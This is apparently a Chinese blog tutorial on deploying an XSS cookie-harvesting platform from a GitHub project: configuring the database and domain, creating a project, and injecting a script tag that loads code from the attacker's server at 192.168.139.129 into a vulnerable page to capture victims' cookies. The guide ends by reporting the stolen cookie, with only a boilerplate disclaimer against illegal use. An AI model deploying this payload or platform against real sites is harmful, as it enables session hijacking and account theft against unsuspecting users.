XSS平台搭建及利用

简介: XSS平台搭建及利用

一、下载平台源码、拷贝到我们网站的根目录

https://github.com/anwilx/xss_platform

0a2653c851af460fa595bd959398a8f1.png

二、修改相关参数

1、config.php,数据库用户、密码、还有xss平台的访问路径

0eacb84100b54626af849e6b562bf92a.png

2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库

新建数据库

2d65d23f6d4748949b924e4057485923.png

打开xssplatform.sql,将里面的sql语句执行一遍

2e9b90b2ca334476abebe75bafe6eeaa.png

3、更新站点域名,将作者的域名替换,一共有四处

将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss");

4、修改authtest文件

4cebaac233b3433da32a72337a77fc60.png

三、平台利用

1、注册一个账户

6de278e6d6694ce5bb08e7e842b7e74b.png

2、创建一个项目

7a399525ddec4b77923c464820b33738 (1).png

3、配置相关信息,根据需要,添加模块

7a399525ddec4b77923c464820b33738.png

4、复制script里面代码,插入到存在xss漏洞的页面

<script src=http://192.168.139.129/xss/E3vbsa></script>

0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png

5、打开xss平台,已获取对方cookie

2d65d23f6d4748949b924e4057485923.png

禁止非法,后果自负

目录
相关文章
|
13天前
|
前端开发 网络安全
【XSS平台】使用,网络安全开发必学
【XSS平台】使用,网络安全开发必学
|
13天前
|
前端开发 网络安全
【XSS平台】使用(1),网络安全插件化+模块化+组件化+热修复
【XSS平台】使用(1),网络安全插件化+模块化+组件化+热修复
|
15天前
|
SQL 安全 数据库
XSS平台搭建及利用
XSS平台搭建及利用
73 0
|
Web App开发 SQL JavaScript
XSS练习平台【XSS Challenges】
XSS练习平台【XSS Challenges】
145 0
|
SQL 安全 数据库
XSS平台搭建及利用
XSS平台搭建及利用
1483 0
XSS平台搭建及利用
|
存储 弹性计算 安全
阿里云的运用——搭建属于自己的xss平台
在校期间搭建一个属于自己的xss平台
975 0
阿里云的运用——搭建属于自己的xss平台
|
存储 开发框架 安全
科普跨站平台 XSS shell 使用方法
理解xss shell是什么之前,让我们一起回顾一下一些基本的xss(跨站脚本),xss是最常见的一个漏洞,存在于今天许多的web应用程序。xss是攻击者试图通过web应用程序执行恶意脚本的技术,攻击者通过突破同源策略的web应用程序。
490 0
科普跨站平台 XSS shell 使用方法
|
15天前
|
存储 JavaScript 前端开发
前端xss攻击——规避innerHtml过滤标签节点及属性
前端xss攻击——规避innerHtml过滤标签节点及属性
60 4
|
15天前
|
JavaScript 安全 前端开发
js开发:请解释什么是XSS攻击和CSRF攻击,并说明如何防范这些攻击。
XSS和CSRF是两种常见的Web安全威胁。XSS攻击通过注入恶意脚本盗取用户信息或控制账户,防范措施包括输入验证、内容编码、HTTPOnly Cookie和CSP。CSRF攻击则诱使用户执行未经授权操作,防范手段有CSRF Tokens、双重验证、Referer检查和SameSite Cookie属性。开发者应采取这些防御措施并定期进行安全审计以增强应用安全性。
31 0